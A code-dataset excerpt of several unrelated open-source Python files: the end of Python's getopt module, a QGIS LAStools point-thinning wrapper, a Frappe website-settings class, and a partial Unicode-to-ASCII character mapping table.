def __init__(self, msg, opt=''):
self.msg = msg
self.opt = opt
Exception.__init__(self, msg, opt)
def __str__(self):
return self.msg
error = GetoptError # backward compatibility
def getopt(args, shortopts, longopts = []):
"""getopt(args, options[, long_options]) -> opts, args
Parses command line options and parameter list. args is the
argument list to be parsed, without the leading reference to the
running program. Typically, this means "sys.argv[1:]". shortopts
is the string of option letters that the script wants to
recognize, with options that require an argument followed by a
colon (i.e., the same format that Unix getopt() uses). If
specified, longopts is a list of strings with the names of the
long options which should be supported. The leading '--'
characters should not be included in the option name. Options
which require an argument should be followed by an equal sign
('=').
The return value consists of two elements: the first is a list of
(option, value) pairs; the second is the list of program arguments
left after the option list was stripped (this is a trailing slice
of the first argument). Each option-and-value pair returned has
the option as its first element, prefixed with a hyphen (e.g.,
'-x'), and the option argument as its second element, or an empty
string if the option has no argument. The options occur in the
list in the same order in which they were found, thus allowing
multiple occurrences. Long and short options may be mixed.
"""
opts = []
if type(longopts) == type(""):
longopts = [longopts]
else:
longopts = list(longopts)
while args and args[0].startswith('-') and args[0] != '-':
if args[0] == '--':
args = args[1:]
break
if args[0].startswith('--'):
opts, args = do_longs(opts, args[0][2:], longopts, args[1:])
else:
opts, args = do_shorts(opts, args[0][1:], shortopts, args[1:])
return opts, args
def gnu_getopt(args, shortopts, longopts = []):
"""getopt(args, options[, long_options]) -> opts, args
This function works like getopt(), except that GNU style scanning
mode is used by default. This means that option and non-option
arguments may be intermixed. The getopt() function stops
processing options as soon as a non-option argument is
encountered.
If the first character of the option string is `+', or if the
environment variable POSIXLY_CORRECT is set, then option
processing stops as soon as a non-option argument is encountered.
"""
opts = []
prog_args = []
if isinstance(longopts, str):
longopts = [longopts]
else:
longopts = list(longopts)
# Allow options after non-option arguments?
if shortopts.startswith('+'):
shortopts = shortopts[1:]
all_options_first = True
elif os.environ.get("POSIXLY_CORRECT"):
all_options_first = True
else:
all_options_first = False
while args:
if args[0] == '--':
prog_args += args[1:]
break
if args[0][:2] == '--':
opts, args = do_longs(opts, args[0][2:], longopts, args[1:])
elif args[0][:1] == '-' and args[0] != '-':
opts, args = do_shorts(opts, args[0][1:], shortopts, args[1:])
else:
if all_options_first:
prog_args += args
break
else:
prog_args.append(args[0])
args = args[1:]
return opts, prog_args
def do_longs(opts, opt, longopts, args):
try:
i = opt.index('=')
except ValueError:
optarg = None
else:
opt, optarg = opt[:i], opt[i+1:]
has_arg, opt = long_has_args(opt, longopts)
if has_arg:
if optarg is None:
if not args:
raise GetoptError(_('option --%s requires argument') % opt, opt)
optarg, args = args[0], args[1:]
elif optarg is not None:
raise GetoptError(_('option --%s must not have an argument') % opt, opt)
opts.append(('--' + opt, optarg or ''))
return opts, args
# Return:
# has_arg?
# full option name
def long_has_args(opt, longopts):
possibilities = [o for o in longopts if o.startswith(opt)]
if not possibilities:
raise GetoptError(_('option --%s not recognized') % opt, opt)
# Is there an exact match?
if opt in possibilities:
return False, opt
elif opt + '=' in possibilities:
return True, opt
# No exact match, so better be unique.
if len(possibilities) > 1:
# XXX since possibilities contains all valid continuations, might be
# nice to work them into the error msg
raise GetoptError(_('option --%s not a unique prefix') % opt, opt)
assert len(possibilities) == 1
unique_match = possibilities[0]
has_arg = unique_match.endswith('=')
if has_arg:
unique_match = unique_match[:-1]
return has_arg, unique_match
def do_shorts(opts, optstring, shortopts, args):
while optstring != '':
opt, optstring = optstring[0], optstring[1:]
if short_has_arg(opt, shortopts):
if optstring == '':
if not args:
raise GetoptError(_('option -%s requires argument') % opt,
opt)
optstring, args = args[0], args[1:]
optarg, optstring = optstring, ''
else:
optarg = ''
opts.append(('-' + opt, optarg))
return opts, args
def short_has_arg(opt, shortopts):
for i in range(len(shortopts)):
if opt == shortopts[i] != ':':
return shortopts.startswith(':', i+1)
raise GetoptError(_('option -%s not recognized') % opt, opt)
if __name__ == '__main__':
import sys
print(getopt(sys.argv[1:], "a:b", ["alpha=", "beta"]))
| gpl-3.0 |
SebDieBln/QGIS | python/plugins/processing/algs/lidar/lastools/lasthin.py | 12 | 3757 | # -*- coding: utf-8 -*-
"""
***************************************************************************
lasthin.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Martin Isenburg'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Martin Isenburg'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterSelection
class lasthin(LAStoolsAlgorithm):
THIN_STEP = "THIN_STEP"
OPERATION = "OPERATION"
OPERATIONS = ["lowest", "random", "highest"]
WITHHELD = "WITHHELD"
CLASSIFY_AS = "CLASSIFY_AS"
CLASSIFY_AS_CLASS = "CLASSIFY_AS_CLASS"
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('lasthin')
self.group, self.i18n_group = self.trAlgorithm('LAStools')
self.addParametersVerboseGUI()
self.addParametersPointInputGUI()
self.addParameter(ParameterNumber(lasthin.THIN_STEP,
self.tr("size of grid used for thinning"), 0, None, 1.0))
self.addParameter(ParameterSelection(lasthin.OPERATION,
self.tr("keep particular point per cell"), lasthin.OPERATIONS, 0))
self.addParameter(ParameterBoolean(lasthin.WITHHELD,
self.tr("mark thinned-away points as withheld"), False))
self.addParameter(ParameterBoolean(lasthin.CLASSIFY_AS,
self.tr("classify surviving points as class"), False))
self.addParameter(ParameterNumber(lasthin.CLASSIFY_AS_CLASS,
self.tr("class"), 0, None, 8))
self.addParametersPointOutputGUI()
self.addParametersAdditionalGUI()
def processAlgorithm(self, progress):
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasthin")]
self.addParametersVerboseCommands(commands)
self.addParametersPointInputCommands(commands)
step = self.getParameterValue(lasthin.THIN_STEP)
if step != 0.0:
commands.append("-step")
commands.append(unicode(step))
operation = self.getParameterValue(lasthin.OPERATION)
if operation != 0:
commands.append("-" + self.OPERATIONS[operation])
if self.getParameterValue(lasthin.WITHHELD):
commands.append("-withheld")
if self.getParameterValue(lasthin.CLASSIFY_AS):
commands.append("-classify_as")
commands.append(unicode(self.getParameterValue(lasthin.CLASSIFY_AS_CLASS)))
self.addParametersPointOutputCommands(commands)
self.addParametersAdditionalCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
| gpl-2.0 |
indictranstech/reciphergroup-frappe | frappe/website/doctype/website_settings/website_settings.py | 27 | 4297 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import get_request_site_address, encode
from frappe.model.document import Document
from urllib import quote
from frappe.website.router import resolve_route
from frappe.website.doctype.website_theme.website_theme import add_website_theme
class WebsiteSettings(Document):
def validate(self):
self.validate_top_bar_items()
self.validate_footer_items()
self.validate_home_page()
def validate_home_page(self):
if frappe.flags.in_install:
return
if self.home_page and not resolve_route(self.home_page):
frappe.msgprint(_("Invalid Home Page") + " (Standard pages - index, login, products, blog, about, contact)")
self.home_page = ''
def validate_top_bar_items(self):
"""validate url in top bar items"""
for top_bar_item in self.get("top_bar_items"):
if top_bar_item.parent_label:
parent_label_item = self.get("top_bar_items", {"label": top_bar_item.parent_label})
if not parent_label_item:
# invalid item
frappe.throw(_("{0} does not exist in row {1}").format(top_bar_item.parent_label, top_bar_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
frappe.throw(_("{0} in row {1} cannot have both URL and child items").format(top_bar_item.parent_label,
top_bar_item.idx))
def validate_footer_items(self):
"""clear parent label in footer"""
for footer_item in self.get("footer_items"):
footer_item.parent_label = None
def on_update(self):
self.clear_cache()
def clear_cache(self):
# make js and css
# clear web cache (for menus!)
from frappe.sessions import clear_cache
clear_cache('Guest')
from frappe.website.render import clear_cache
clear_cache()
# clears role based home pages
frappe.clear_cache()
def get_website_settings():
hooks = frappe.get_hooks()
all_top_items = frappe.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield='top_bar_items'
order by idx asc""", as_dict=1)
top_items = [d for d in all_top_items if not d['parent_label']]
# attach child items to top bar
for d in all_top_items:
if d['parent_label']:
for t in top_items:
if t['label']==d['parent_label']:
if not 'child_items' in t:
t['child_items'] = []
t['child_items'].append(d)
break
context = frappe._dict({
'top_bar_items': top_items,
'footer_items': frappe.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield='footer_items'
order by idx asc""", as_dict=1),
"post_login": [
{"label": "My Account", "url": "/me"},
{"class": "divider"},
{"label": "Logout", "url": "/?cmd=web_logout"}
]
})
settings = frappe.get_doc("Website Settings", "Website Settings")
for k in ["banner_html", "brand_html", "copyright", "twitter_share_via",
"facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup", "hide_footer_signup", "head_html"]:
if hasattr(settings, k):
context[k] = settings.get(k)
if settings.address:
context["footer_address"] = settings.address
for k in ["facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup"]:
context[k] = int(context.get(k) or 0)
if frappe.request:
context.url = quote(str(get_request_site_address(full_address=True)), safe="/:")
context.encoded_title = quote(encode(context.title or ""), str(""))
for update_website_context in hooks.update_website_context or []:
frappe.get_attr(update_website_context)(context)
context.web_include_js = hooks.web_include_js or []
context.web_include_css = hooks.web_include_css or []
via_hooks = frappe.get_hooks("website_context")
for key in via_hooks:
context[key] = via_hooks[key]
if key not in ("top_bar_items", "footer_items", "post_login") \
and isinstance(context[key], (list, tuple)):
context[key] = context[key][0]
add_website_theme(context)
if not context.get("favicon"):
context["favicon"] = "/assets/frappe/images/favicon.png"
if settings.favicon and settings.favicon != "attach_files:":
context["favicon"] = settings.favicon
return context
| mit |
hzlf/openbroadcast.org | website/base/utils/fold_to_ascii/mapping.py | 2 | 27241 | # -*- coding: utf-8 -*-
"""
Mappings suitable for translate tables.
"""
# To see printed representation of character `k`:
# print(unichr(k))
#
# ASCII characters replace to themselves.
codepoint_to_self = [
(0x0, u"\x00"),
(0x1, u"\x01"),
(0x2, u"\x02"),
(0x3, u"\x03"),
(0x4, u"\x04"),
(0x5, u"\x05"),
(0x6, u"\x06"),
(0x7, u"\x07"),
(0x8, u"\x08"),
(0x9, u"\t"),
(0xA, u"\n"),
(0xB, u"\x0b"),
(0xC, u"\x0c"),
(0xD, u"\r"),
(0xE, u"\x0e"),
(0xF, u"\x0f"),
(0x10, u"\x10"),
(0x11, u"\x11"),
(0x12, u"\x12"),
(0x13, u"\x13"),
(0x14, u"\x14"),
(0x15, u"\x15"),
(0x16, u"\x16"),
(0x17, u"\x17"),
(0x18, u"\x18"),
(0x19, u"\x19"),
(0x1A, u"\x1a"),
(0x1B, u"\x1b"),
(0x1C, u"\x1c"),
(0x1D, u"\x1d"),
(0x1E, u"\x1e"),
(0x1F, u"\x1f"),
(0x20, u" "),
(0x21, u"!"),
(0x22, u'"'),
(0x23, u"#"),
(0x24, u"$"),
(0x25, u"%"),
(0x26, u"&"),
(0x27, u"'"),
(0x28, u"("),
(0x29, u")"),
(0x2A, u"*"),
(0x2B, u"+"),
(0x2C, u","),
(0x2D, u"-"),
(0x2E, u"."),
(0x2F, u"/"),
(0x30, u"0"),
(0x31, u"1"),
(0x32, u"2"),
(0x33, u"3"),
(0x34, u"4"),
(0x35, u"5"),
(0x36, u"6"),
(0x37, u"7"),
(0x38, u"8"),
(0x39, u"9"),
(0x3A, u":"),
(0x3B, u";"),
(0x3C, u"<"),
(0x3D, u"="),
(0x3E, u">"),
(0x3F, u"?"),
(0x40, u"@"),
(0x41, u"A"),
(0x42, u"B"),
(0x43, u"C"),
(0x44, u"D"),
(0x45, u"E"),
(0x46, u"F"),
(0x47, u"G"),
(0x48, u"H"),
(0x49, u"I"),
(0x4A, u"J"),
(0x4B, u"K"),
(0x4C, u"L"),
(0x4D, u"M"),
(0x4E, u"N"),
(0x4F, u"O"),
(0x50, u"P"),
(0x51, u"Q"),
(0x52, u"R"),
(0x53, u"S"),
(0x54, u"T"),
(0x55, u"U"),
(0x56, u"V"),
(0x57, u"W"),
(0x58, u"X"),
(0x59, u"Y"),
(0x5A, u"Z"),
(0x5B, u"["),
(0x5C, u"\\"),
(0x5D, u"]"),
(0x5E, u"^"),
(0x5F, u"_"),
(0x60, u"`"),
(0x61, u"a"),
(0x62, u"b"),
(0x63, u"c"),
(0x64, u"d"),
(0x65, u"e"),
(0x66, u"f"),
(0x67, u"g"),
(0x68, u"h"),
(0x69, u"i"),
(0x6A, u"j"),
(0x6B, u"k"),
(0x6C, u"l"),
(0x6D, u"m"),
(0x6E, u"n"),
(0x6F, u"o"),
(0x70, u"p"),
(0x71, u"q"),
(0x72, u"r"),
(0x73, u"s"),
(0x74, u"t"),
(0x75, u"u"),
(0x76, u"v"),
(0x77, u"w"),
(0x78, u"x"),
(0x79, u"y"),
(0x7A, u"z"),
(0x7B, u"{"),
(0x7C, u"|"),
(0x7D, u"}"),
(0x7E, u"~"),
]
codepoint_to_replacement = [
(0xC0, u"A"),
(0xC1, u"A"),
(0xC2, u"A"),
(0xC3, u"A"),
(0xC4, u"A"),
(0xC5, u"A"),
(0x100, u"A"),
(0x102, u"A"),
(0x104, u"A"),
(0x18F, u"A"),
(0x1CD, u"A"),
(0x1DE, u"A"),
(0x1E0, u"A"),
(0x1FA, u"A"),
(0x200, u"A"),
(0x202, u"A"),
(0x226, u"A"),
(0x23A, u"A"),
(0x1D00, u"A"),
(0x1E00, u"A"),
(0x1EA0, u"A"),
(0x1EA2, u"A"),
(0x1EA4, u"A"),
(0x1EA6, u"A"),
(0x1EA8, u"A"),
(0x1EAA, u"A"),
(0x1EAC, u"A"),
(0x1EAE, u"A"),
(0x1EB0, u"A"),
(0x1EB2, u"A"),
(0x1EB4, u"A"),
(0x1EB6, u"A"),
(0x24B6, u"A"),
(0xFF21, u"A"),
(0xE0, u"a"),
(0xE1, u"a"),
(0xE2, u"a"),
(0xE3, u"a"),
(0xE4, u"a"),
(0xE5, u"a"),
(0x101, u"a"),
(0x103, u"a"),
(0x105, u"a"),
(0x1CE, u"a"),
(0x1DF, u"a"),
(0x1E1, u"a"),
(0x1FB, u"a"),
(0x201, u"a"),
(0x203, u"a"),
(0x227, u"a"),
(0x250, u"a"),
(0x259, u"a"),
(0x25A, u"a"),
(0x1D8F, u"a"),
(0x1D95, u"a"),
(0x1E01, u"a"),
(0x1E9A, u"a"),
(0x1EA1, u"a"),
(0x1EA3, u"a"),
(0x1EA5, u"a"),
(0x1EA7, u"a"),
(0x1EA9, u"a"),
(0x1EAB, u"a"),
(0x1EAD, u"a"),
(0x1EAF, u"a"),
(0x1EB1, u"a"),
(0x1EB3, u"a"),
(0x1EB5, u"a"),
(0x1EB7, u"a"),
(0x2090, u"a"),
(0x2094, u"a"),
(0x24D0, u"a"),
(0x2C65, u"a"),
(0x2C6F, u"a"),
(0xFF41, u"a"),
(0xA732, u"AA"),
(0xC6, u"AE"),
(0x1E2, u"AE"),
(0x1FC, u"AE"),
(0x1D01, u"AE"),
(0xA734, u"AO"),
(0xA736, u"AU"),
(0xA738, u"AV"),
(0xA73A, u"AV"),
(0xA73C, u"AY"),
(0x249C, u"(a)"),
(0xA733, u"aa"),
(0xE6, u"ae"),
(0x1E3, u"ae"),
(0x1FD, u"ae"),
(0x1D02, u"ae"),
(0xA735, u"ao"),
(0xA737, u"au"),
(0xA739, u"av"),
(0xA73B, u"av"),
(0xA73D, u"ay"),
(0x181, u"B"),
(0x182, u"B"),
(0x243, u"B"),
(0x299, u"B"),
(0x1D03, u"B"),
(0x1E02, u"B"),
(0x1E04, u"B"),
(0x1E06, u"B"),
(0x24B7, u"B"),
(0xFF22, u"B"),
(0x180, u"b"),
(0x183, u"b"),
(0x253, u"b"),
(0x1D6C, u"b"),
(0x1D80, u"b"),
(0x1E03, u"b"),
(0x1E05, u"b"),
(0x1E07, u"b"),
(0x24D1, u"b"),
(0xFF42, u"b"),
(0x249D, u"(b)"),
(0xC7, u"C"),
(0x106, u"C"),
(0x108, u"C"),
(0x10A, u"C"),
(0x10C, u"C"),
(0x187, u"C"),
(0x23B, u"C"),
(0x297, u"C"),
(0x1D04, u"C"),
(0x1E08, u"C"),
(0x24B8, u"C"),
(0xFF23, u"C"),
(0xE7, u"c"),
(0x107, u"c"),
(0x109, u"c"),
(0x10B, u"c"),
(0x10D, u"c"),
(0x188, u"c"),
(0x23C, u"c"),
(0x255, u"c"),
(0x1E09, u"c"),
(0x2184, u"c"),
(0x24D2, u"c"),
(0xA73E, u"c"),
(0xA73F, u"c"),
(0xFF43, u"c"),
(0x249E, u"(c)"),
(0xD0, u"D"),
(0x10E, u"D"),
(0x110, u"D"),
(0x189, u"D"),
(0x18A, u"D"),
(0x18B, u"D"),
(0x1D05, u"D"),
(0x1D06, u"D"),
(0x1E0A, u"D"),
(0x1E0C, u"D"),
(0x1E0E, u"D"),
(0x1E10, u"D"),
(0x1E12, u"D"),
(0x24B9, u"D"),
(0xA779, u"D"),
(0xFF24, u"D"),
(0xF0, u"d"),
(0x10F, u"d"),
(0x111, u"d"),
(0x18C, u"d"),
(0x221, u"d"),
(0x256, u"d"),
(0x257, u"d"),
(0x1D6D, u"d"),
(0x1D81, u"d"),
(0x1D91, u"d"),
(0x1E0B, u"d"),
(0x1E0D, u"d"),
(0x1E0F, u"d"),
(0x1E11, u"d"),
(0x1E13, u"d"),
(0x24D3, u"d"),
(0xA77A, u"d"),
(0xFF44, u"d"),
(0x1C4, u"DZ"),
(0x1F1, u"DZ"),
(0x1C5, u"Dz"),
(0x1F2, u"Dz"),
(0x249F, u"(d)"),
(0x238, u"db"),
(0x1C6, u"dz"),
(0x1F3, u"dz"),
(0x2A3, u"dz"),
(0x2A5, u"dz"),
(0xC8, u"E"),
(0xC9, u"E"),
(0xCA, u"E"),
(0xCB, u"E"),
(0x112, u"E"),
(0x114, u"E"),
(0x116, u"E"),
(0x118, u"E"),
(0x11A, u"E"),
(0x18E, u"E"),
(0x190, u"E"),
(0x204, u"E"),
(0x206, u"E"),
(0x228, u"E"),
(0x246, u"E"),
(0x1D07, u"E"),
(0x1E14, u"E"),
(0x1E16, u"E"),
(0x1E18, u"E"),
(0x1E1A, u"E"),
(0x1E1C, u"E"),
(0x1EB8, u"E"),
(0x1EBA, u"E"),
(0x1EBC, u"E"),
(0x1EBE, u"E"),
(0x1EC0, u"E"),
(0x1EC2, u"E"),
(0x1EC4, u"E"),
(0x1EC6, u"E"),
(0x24BA, u"E"),
(0x2C7B, u"E"),
(0xFF25, u"E"),
(0xE8, u"e"),
(0xE9, u"e"),
(0xEA, u"e"),
(0xEB, u"e"),
(0x113, u"e"),
(0x115, u"e"),
(0x117, u"e"),
(0x119, u"e"),
(0x11B, u"e"),
(0x1DD, u"e"),
(0x205, u"e"),
(0x207, u"e"),
(0x229, u"e"),
(0x247, u"e"),
(0x258, u"e"),
(0x25B, u"e"),
(0x25C, u"e"),
(0x25D, u"e"),
(0x25E, u"e"),
(0x29A, u"e"),
(0x1D08, u"e"),
(0x1D92, u"e"),
(0x1D93, u"e"),
(0x1D94, u"e"),
(0x1E15, u"e"),
(0x1E17, u"e"),
(0x1E19, u"e"),
(0x1E1B, u"e"),
(0x1E1D, u"e"),
(0x1EB9, u"e"),
(0x1EBB, u"e"),
(0x1EBD, u"e"),
(0x1EBF, u"e"),
(0x1EC1, u"e"),
(0x1EC3, u"e"),
(0x1EC5, u"e"),
(0x1EC7, u"e"),
(0x2091, u"e"),
(0x24D4, u"e"),
(0x2C78, u"e"),
(0xFF45, u"e"),
(0x24A0, u"(e)"),
(0x191, u"F"),
(0x1E1E, u"F"),
(0x24BB, u"F"),
(0xA730, u"F"),
(0xA77B, u"F"),
(0xA7FB, u"F"),
(0xFF26, u"F"),
(0x192, u"f"),
(0x1D6E, u"f"),
(0x1D82, u"f"),
(0x1E1F, u"f"),
(0x1E9B, u"f"),
(0x24D5, u"f"),
(0xA77C, u"f"),
(0xFF46, u"f"),
(0x24A1, u"(f)"),
(0xFB00, u"ff"),
(0xFB03, u"ffi"),
(0xFB04, u"ffl"),
(0xFB01, u"fi"),
(0xFB02, u"fl"),
(0x11C, u"G"),
(0x11E, u"G"),
(0x120, u"G"),
(0x122, u"G"),
(0x193, u"G"),
(0x1E4, u"G"),
(0x1E5, u"G"),
(0x1E6, u"G"),
(0x1E7, u"G"),
(0x1F4, u"G"),
(0x262, u"G"),
(0x29B, u"G"),
(0x1E20, u"G"),
(0x24BC, u"G"),
(0xA77D, u"G"),
(0xA77E, u"G"),
(0xFF27, u"G"),
(0x11D, u"g"),
(0x11F, u"g"),
(0x121, u"g"),
(0x123, u"g"),
(0x1F5, u"g"),
(0x260, u"g"),
(0x261, u"g"),
(0x1D77, u"g"),
(0x1D79, u"g"),
(0x1D83, u"g"),
(0x1E21, u"g"),
(0x24D6, u"g"),
(0xA77F, u"g"),
(0xFF47, u"g"),
(0x24A2, u"(g)"),
(0x124, u"H"),
(0x126, u"H"),
(0x21E, u"H"),
(0x29C, u"H"),
(0x1E22, u"H"),
(0x1E24, u"H"),
(0x1E26, u"H"),
(0x1E28, u"H"),
(0x1E2A, u"H"),
(0x24BD, u"H"),
(0x2C67, u"H"),
(0x2C75, u"H"),
(0xFF28, u"H"),
(0x125, u"h"),
(0x127, u"h"),
(0x21F, u"h"),
(0x265, u"h"),
(0x266, u"h"),
(0x2AE, u"h"),
(0x2AF, u"h"),
(0x1E23, u"h"),
(0x1E25, u"h"),
(0x1E27, u"h"),
(0x1E29, u"h"),
(0x1E2B, u"h"),
(0x1E96, u"h"),
(0x24D7, u"h"),
(0x2C68, u"h"),
(0x2C76, u"h"),
(0xFF48, u"h"),
(0x1F6, u"HV"),
(0x24A3, u"(h)"),
(0x195, u"hv"),
(0xCC, u"I"),
(0xCD, u"I"),
(0xCE, u"I"),
(0xCF, u"I"),
(0x128, u"I"),
(0x12A, u"I"),
(0x12C, u"I"),
(0x12E, u"I"),
(0x130, u"I"),
(0x196, u"I"),
(0x197, u"I"),
(0x1CF, u"I"),
(0x208, u"I"),
(0x20A, u"I"),
(0x26A, u"I"),
(0x1D7B, u"I"),
(0x1E2C, u"I"),
(0x1E2E, u"I"),
(0x1EC8, u"I"),
(0x1ECA, u"I"),
(0x24BE, u"I"),
(0xA7FE, u"I"),
(0xFF29, u"I"),
(0xEC, u"i"),
(0xED, u"i"),
(0xEE, u"i"),
(0xEF, u"i"),
(0x129, u"i"),
(0x12B, u"i"),
(0x12D, u"i"),
(0x12F, u"i"),
(0x131, u"i"),
(0x1D0, u"i"),
(0x209, u"i"),
(0x20B, u"i"),
(0x268, u"i"),
(0x1D09, u"i"),
(0x1D62, u"i"),
(0x1D7C, u"i"),
(0x1D96, u"i"),
(0x1E2D, u"i"),
(0x1E2F, u"i"),
(0x1EC9, u"i"),
(0x1ECB, u"i"),
(0x2071, u"i"),
(0x24D8, u"i"),
(0xFF49, u"i"),
(0x132, u"IJ"),
(0x24A4, u"(i)"),
(0x133, u"ij"),
(0x134, u"J"),
(0x248, u"J"),
(0x1D0A, u"J"),
(0x24BF, u"J"),
(0xFF2A, u"J"),
(0x135, u"j"),
(0x1F0, u"j"),
(0x237, u"j"),
(0x249, u"j"),
(0x25F, u"j"),
(0x284, u"j"),
(0x29D, u"j"),
(0x24D9, u"j"),
(0x2C7C, u"j"),
(0xFF4A, u"j"),
(0x24A5, u"(j)"),
(0x136, u"K"),
(0x198, u"K"),
(0x1E8, u"K"),
(0x1D0B, u"K"),
(0x1E30, u"K"),
(0x1E32, u"K"),
(0x1E34, u"K"),
(0x24C0, u"K"),
(0x2C69, u"K"),
(0xA740, u"K"),
(0xA742, u"K"),
(0xA744, u"K"),
(0xFF2B, u"K"),
(0x137, u"k"),
(0x199, u"k"),
(0x1E9, u"k"),
(0x29E, u"k"),
(0x1D84, u"k"),
(0x1E31, u"k"),
(0x1E33, u"k"),
(0x1E35, u"k"),
(0x24DA, u"k"),
(0x2C6A, u"k"),
(0xA741, u"k"),
(0xA743, u"k"),
(0xA745, u"k"),
(0xFF4B, u"k"),
(0x24A6, u"(k)"),
(0x139, u"L"),
(0x13B, u"L"),
(0x13D, u"L"),
(0x13F, u"L"),
(0x141, u"L"),
(0x23D, u"L"),
(0x29F, u"L"),
(0x1D0C, u"L"),
(0x1E36, u"L"),
(0x1E38, u"L"),
(0x1E3A, u"L"),
(0x1E3C, u"L"),
(0x24C1, u"L"),
(0x2C60, u"L"),
(0x2C62, u"L"),
(0xA746, u"L"),
(0xA748, u"L"),
(0xA780, u"L"),
(0xFF2C, u"L"),
(0x13A, u"l"),
(0x13C, u"l"),
(0x13E, u"l"),
(0x140, u"l"),
(0x142, u"l"),
(0x19A, u"l"),
(0x234, u"l"),
(0x26B, u"l"),
(0x26C, u"l"),
(0x26D, u"l"),
(0x1D85, u"l"),
(0x1E37, u"l"),
(0x1E39, u"l"),
(0x1E3B, u"l"),
(0x1E3D, u"l"),
(0x24DB, u"l"),
(0x2C61, u"l"),
(0xA747, u"l"),
(0xA749, u"l"),
(0xA781, u"l"),
(0xFF4C, u"l"),
(0x1C7, u"LJ"),
(0x1EFA, u"LL"),
(0x1C8, u"Lj"),
(0x24A7, u"(l)"),
(0x1C9, u"lj"),
(0x1EFB, u"ll"),
(0x2AA, u"ls"),
(0x2AB, u"lz"),
(0x19C, u"M"),
(0x1D0D, u"M"),
(0x1E3E, u"M"),
(0x1E40, u"M"),
(0x1E42, u"M"),
(0x24C2, u"M"),
(0x2C6E, u"M"),
(0xA7FD, u"M"),
(0xA7FF, u"M"),
(0xFF2D, u"M"),
(0x26F, u"m"),
(0x270, u"m"),
(0x271, u"m"),
(0x1D6F, u"m"),
(0x1D86, u"m"),
(0x1E3F, u"m"),
(0x1E41, u"m"),
(0x1E43, u"m"),
(0x24DC, u"m"),
(0xFF4D, u"m"),
(0x24A8, u"(m)"),
(0xD1, u"N"),
(0x143, u"N"),
(0x145, u"N"),
(0x147, u"N"),
(0x14A, u"N"),
(0x19D, u"N"),
(0x1F8, u"N"),
(0x220, u"N"),
(0x274, u"N"),
(0x1D0E, u"N"),
(0x1E44, u"N"),
(0x1E46, u"N"),
(0x1E48, u"N"),
(0x1E4A, u"N"),
(0x24C3, u"N"),
(0xFF2E, u"N"),
(0xF1, u"n"),
(0x144, u"n"),
(0x146, u"n"),
(0x148, u"n"),
(0x149, u"n"),
(0x14B, u"n"),
(0x19E, u"n"),
(0x1F9, u"n"),
(0x235, u"n"),
(0x272, u"n"),
(0x273, u"n"),
(0x1D70, u"n"),
(0x1D87, u"n"),
(0x1E45, u"n"),
(0x1E47, u"n"),
(0x1E49, u"n"),
(0x1E4B, u"n"),
(0x207F, u"n"),
(0x24DD, u"n"),
(0xFF4E, u"n"),
(0x1CA, u"NJ"),
(0x1CB, u"Nj"),
(0x24A9, u"(n)"),
(0x1CC, u"nj"),
(0xD2, u"O"),
(0xD3, u"O"),
(0xD4, u"O"),
(0xD5, u"O"),
(0xD6, u"O"),
(0xD8, u"O"),
(0x14C, u"O"),
(0x14E, u"O"),
(0x150, u"O"),
(0x186, u"O"),
(0x19F, u"O"),
(0x1A0, u"O"),
(0x1D1, u"O"),
(0x1EA, u"O"),
(0x1EC, u"O"),
(0x1FE, u"O"),
(0x20C, u"O"),
(0x20E, u"O"),
(0x22A, u"O"),
(0x22C, u"O"),
(0x22E, u"O"),
(0x230, u"O"),
(0x1D0F, u"O"),
(0x1D10, u"O"),
(0x1E4C, u"O"),
(0x1E4E, u"O"),
(0x1E50, u"O"),
(0x1E52, u"O"),
(0x1ECC, u"O"),
(0x1ECE, u"O"),
(0x1ED0, u"O"),
(0x1ED2, u"O"),
(0x1ED4, u"O"),
(0x1ED6, u"O"),
(0x1ED8, u"O"),
(0x1EDA, u"O"),
(0x1EDC, u"O"),
(0x1EDE, u"O"),
(0x1EE0, u"O"),
(0x1EE2, u"O"),
(0x24C4, u"O"),
(0xA74A, u"O"),
(0xA74C, u"O"),
(0xFF2F, u"O"),
(0xF2, u"o"),
(0xF3, u"o"),
(0xF4, u"o"),
(0xF5, u"o"),
(0xF6, u"o"),
(0xF8, u"o"),
(0x14D, u"o"),
(0x14F, u"o"),
(0x151, u"o"),
(0x1A1, u"o"),
(0x1D2, u"o"),
(0x1EB, u"o"),
(0x1ED, u"o"),
(0x1FF, u"o"),
(0x20D, u"o"),
(0x20F, u"o"),
(0x22B, u"o"),
(0x22D, u"o"),
(0x22F, u"o"),
(0x231, u"o"),
(0x254, u"o"),
(0x275, u"o"),
(0x1D16, u"o"),
(0x1D17, u"o"),
(0x1D97, u"o"),
(0x1E4D, u"o"),
(0x1E4F, u"o"),
(0x1E51, u"o"),
(0x1E53, u"o"),
(0x1ECD, u"o"),
(0x1ECF, u"o"),
(0x1ED1, u"o"),
(0x1ED3, u"o"),
(0x1ED5, u"o"),
(0x1ED7, u"o"),
(0x1ED9, u"o"),
(0x1EDB, u"o"),
(0x1EDD, u"o"),
(0x1EDF, u"o"),
(0x1EE1, u"o"),
(0x1EE3, u"o"),
(0x2092, u"o"),
(0x24DE, u"o"),
(0x2C7A, u"o"),
(0xA74B, u"o"),
(0xA74D, u"o"),
(0xFF4F, u"o"),
(0x152, u"OE"),
(0x276, u"OE"),
(0xA74E, u"OO"),
(0x222, u"OU"),
(0x1D15, u"OU"),
(0x24AA, u"(o)"),
(0x153, u"oe"),
(0x1D14, u"oe"),
